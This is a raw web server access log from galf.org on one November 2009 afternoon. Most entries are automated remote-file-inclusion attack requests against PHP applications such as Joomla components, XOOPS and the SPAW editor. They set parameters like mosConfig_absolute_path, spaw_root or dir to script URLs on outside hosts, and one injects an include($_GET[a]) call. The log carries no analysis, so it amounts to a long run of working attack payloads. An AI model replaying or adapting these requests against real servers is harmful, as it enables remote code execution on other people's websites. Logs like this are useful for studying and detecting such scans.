61.47.7.71 - - [01/Nov/2009:16:02:31 -0800] "GET /logs/access_091012.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.newminiclub.nl/logo.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.53.96.178 - - [01/Nov/2009:16:03:39 -0800] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
74.53.96.178 - - [01/Nov/2009:16:03:39 -0800] "GET /logs/access_091012.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://www.abruzzobooking.it/mambots/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [01/Nov/2009:16:03:45 -0800] "GET /logs/access_090817.log//tools/update_translations.php?_SESSION[path]=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [01/Nov/2009:16:03:45 -0800] "GET /logs//tools/update_translations.php?_SESSION[path]=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [01/Nov/2009:16:03:45 -0800] "GET /tools/update_translations.php?_SESSION[path]=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.171.190.107 - - [01/Nov/2009:16:03:55 -0800] "GET /logs//xoops_lib/modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.171.190.107 - - [01/Nov/2009:16:03:55 -0800] "GET /logs/access_090907.log//xoops_lib/modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [01/Nov/2009:16:03:56 -0800] "GET /logs//tools/update_translations.php?_SESSION[path]=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [01/Nov/2009:16:03:56 -0800] "GET /logs/access_090817.log//tools/update_translations.php?_SESSION[path]=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.191.177.210 - - [01/Nov/2009:16:03:56 -0800] "GET /tools/update_translations.php?_SESSION[path]=http://appbbs.onmuz.com//bbs/icon/member_image_box/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.171.190.107 - - [01/Nov/2009:16:06:04 -0800] "GET /xoops_lib/modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.171.190.107 - - [01/Nov/2009:16:06:04 -0800] "GET /logs/access_090907.log//xoops_lib/modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.171.190.107 - - [01/Nov/2009:16:06:14 -0800] "GET /logs//xoops_lib/modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
77.221.130.11 - - [01/Nov/2009:16:06:53 -0800] "GET /xmlrpc.php HTTP/1.1" 404 275 "-" "-" "www.galf.org"
89.171.190.107 - - [01/Nov/2009:16:10:50 -0800] "GET /xoops_lib/modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.171.190.107 - - [01/Nov/2009:16:10:50 -0800] "GET /logs//xoops_lib/modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
89.171.190.107 - - [01/Nov/2009:16:10:50 -0800] "GET /logs/access_090907.log//xoops_lib/modules/protector/onupdate.php?mydirname=a()%7B%7Dinclude($_GET[a]);function%20v&a=http://www.masuccessguy.com//audio/swf?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.209.188 - - [01/Nov/2009:16:15:07 -0800] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
65.55.209.188 - - [01/Nov/2009:16:15:08 -0800] "GET /labia/?M=A HTTP/1.1" 200 524 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:16:17:27 -0800] "GET /logs/access_090518.log/?sourcedir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:16:17:27 -0800] "GET /logs/?sourcedir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:16:17:27 -0800] "GET /?sourcedir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
74.205.54.26 - - [01/Nov/2009:16:18:20 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.54.26 - - [01/Nov/2009:16:18:52 -0800] "GET /logs/access_090720.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.54.26 - - [01/Nov/2009:16:18:52 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.54.26 - - [01/Nov/2009:16:18:52 -0800] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.205.54.26 - - [01/Nov/2009:16:19:12 -0800] "GET /logs/access_090525.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.firstalert.com/legislation-map/id.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:16:19:30 -0800] "GET /?sourcedir=http://unixstats.org/tools/idxx.txt????? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:16:19:30 -0800] "GET /logs/access_090518.log%20%20/?sourcedir=http://unixstats.org/tools/idxx.txt????? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:16:19:30 -0800] "GET /logs/?sourcedir=http://unixstats.org/tools/idxx.txt????? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:16:19:39 -0800] "GET /?sourcedir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:16:19:39 -0800] "GET /logs/access_090518.log%20%20/?sourcedir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:16:19:39 -0800] "GET /logs/?sourcedir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
213.3.26.176 - - [01/Nov/2009:16:20:16 -0800] "GET /logs/access_090406.log%20%20/?sourcedir=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [01/Nov/2009:16:25:50 -0800] "GET /bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [01/Nov/2009:16:26:01 -0800] "GET /logs/access_090921.log//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [01/Nov/2009:16:26:02 -0800] "GET /logs//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:26:55 -0800] "GET /logs/access_090810.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:26:55 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:26:55 -0800] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:26:55 -0800] "GET /logs/access_090720.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:28:26 -0800] "GET /logs///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:28:26 -0800] "GET /logs/access_090720.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:28:26 -0800] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:28:38 -0800] "GET /logs/access_090810.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:28:44 -0800] "GET /logs/access_090720.log%20%20///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:29:09 -0800] "GET /logs/access_090525.log%20%20///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.supliment.polirom.ro/brd/id1.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:29:59 -0800] "GET /logs/access_090720.log%20%20///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.151.255.21 - - [01/Nov/2009:16:32:14 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.nuhalka.ru/senux/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.galf.org"
91.151.255.21 - - [01/Nov/2009:16:32:14 -0800] "GET /skin/zero_vote/error.php?dir=http://www.nuhalka.ru/senux/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.820" "www.galf.org"
72.11.145.8 - - [01/Nov/2009:16:37:27 -0800] "GET /logs/access_090720.log///appserv/main.php?appserv_root=http://www.cubed3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [01/Nov/2009:16:37:27 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.cubed3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [01/Nov/2009:16:37:27 -0800] "GET //appserv/main.php?appserv_root=http://www.cubed3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:04 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:04 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:04 -0800] "GET /logs/access_090504.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:15 -0800] "GET /logs/access_090525.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:15 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:15 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [01/Nov/2009:16:41:16 -0800] "GET /logs/access_090720.log///appserv/main.php?appserv_root=http://www.cubed3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [01/Nov/2009:16:41:16 -0800] "GET //appserv/main.php?appserv_root=http://www.cubed3.com/id.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.11.145.8 - - [01/Nov/2009:16:41:16 -0800] "GET /logs///appserv/main.php?appserv_root=http://www.cubed3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:19 -0800] "GET /logs/access_090615.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:22 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:22 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:23 -0800] "GET /logs/access_090525.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:23 -0800] "GET /logs/access_090427.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:23 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:23 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:41:23 -0800] "GET /logs/access_090504.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
91.192.20.164 - - [01/Nov/2009:16:41:33 -0800] "GET /bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
72.11.145.8 - - [01/Nov/2009:16:41:40 -0800] "GET /logs/access_090831.log///appserv/main.php?appserv_root=http://www.cubed3.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
91.192.20.164 - - [01/Nov/2009:16:41:40 -0800] "GET /logs//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:16:44:49 -0800] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:16:44:49 -0800] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:16:44:49 -0800] "GET /logs/access_090615.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.4.8.14 - - [01/Nov/2009:16:45:34 -0800] "GET /logs/access_090504.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:16:45:44 -0800] "GET /logs/access.log%20%20//bbs/skin/daerew_49gallery/setup.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:16:45:44 -0800] "GET /logs//bbs/skin/daerew_49gallery/setup.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:16:45:44 -0800] "GET /bbs/skin/daerew_49gallery/setup.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:45:56 -0800] "GET /logs/access_090525.log%20%20//?path%5Bdocroot%5D=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:45:56 -0800] "GET /logs//?path%5Bdocroot%5D=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:45:56 -0800] "GET /?path%5Bdocroot%5D=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:45:58 -0800] "GET /logs/access_090413.log%20%20//?path%5Bdocroot%5D=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
174.120.175.4 - - [01/Nov/2009:16:46:09 -0800] "GET ///skin/ggambo7002_board/comment_modify.php?dir=http://diablodimesmusic.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
174.120.175.4 - - [01/Nov/2009:16:46:09 -0800] "GET /logs/access.log////skin/ggambo7002_board/comment_modify.php?dir=http://diablodimesmusic.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
174.120.175.4 - - [01/Nov/2009:16:46:09 -0800] "GET /logs////skin/ggambo7002_board/comment_modify.php?dir=http://diablodimesmusic.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
202.117.58.254 - - [01/Nov/2009:16:47:12 -0800] "GET /logs//components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://201.134.249.164/intranet/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5" "www.galf.org"
202.117.58.254 - - [01/Nov/2009:16:47:12 -0800] "GET /components/com_videodb/core/videodb.class.xml.php?mosConfig_absolute_path=http://201.134.249.164/intranet/test.gif?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051111 Firefox/1.5" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:48:00 -0800] "GET /OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:48:00 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:48:00 -0800] "GET /logs/access.log%20%20//OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:48:19 -0800] "GET /logs/access.log%20%20//OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:48:19 -0800] "GET /OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:48:19 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:48:28 -0800] "GET /OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:48:29 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:48:29 -0800] "GET /logs/access.log%20%20//OLE.php?mosConfig_absolute_path=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:49:07 -0800] "GET /logs/access_090525.log//?path%5Bdocroot%5D=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:49:08 -0800] "GET /logs/access_090413.log//?path%5Bdocroot%5D=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
75.126.218.14 - - [01/Nov/2009:16:50:09 -0800] "GET /logs/access.log//bbs/skin/daerew_49gallery/setup.php?dir=http://www.nailxpert.com/bbs//icon/member_image_box/1/robbys/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:50:10 -0800] "GET /logs/access.log%20%20//OLE.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:50:10 -0800] "GET /OLE.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:50:10 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:50:27 -0800] "GET /logs/access.log%20%20//OLE.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:50:27 -0800] "GET /OLE.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:50:27 -0800] "GET /logs//OLE.php?mosConfig_absolute_path=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.236.23.242 - - [01/Nov/2009:16:50:48 -0800] "GET /logs/access_090406.log//?path%5Bdocroot%5D=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.236.23.242 - - [01/Nov/2009:16:50:48 -0800] "GET /logs/access_090330.log//?path%5Bdocroot%5D=http://creative-alchemy.com/zencart//media/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:16:52:52 -0800] "GET /bbs/skin/daerew_49gallery/setup.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:16:52:52 -0800] "GET /logs//bbs/skin/daerew_49gallery/setup.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:16:52:55 -0800] "GET /logs/access.log%20%20//bbs/skin/daerew_49gallery/setup.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:16:53:10 -0800] "GET /bbs/skin/daerew_49gallery/setup.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:16:53:10 -0800] "GET /logs//bbs/skin/daerew_49gallery/setup.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [01/Nov/2009:16:53:16 -0800] "GET /logs/access.log%20%20//bbs/skin/daerew_49gallery/setup.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
202.123.212.188 - - [01/Nov/2009:16:53:22 -0800] "GET /logs/access_090504.log///modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.mcclearyspub.com/images/los/id1.gif??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
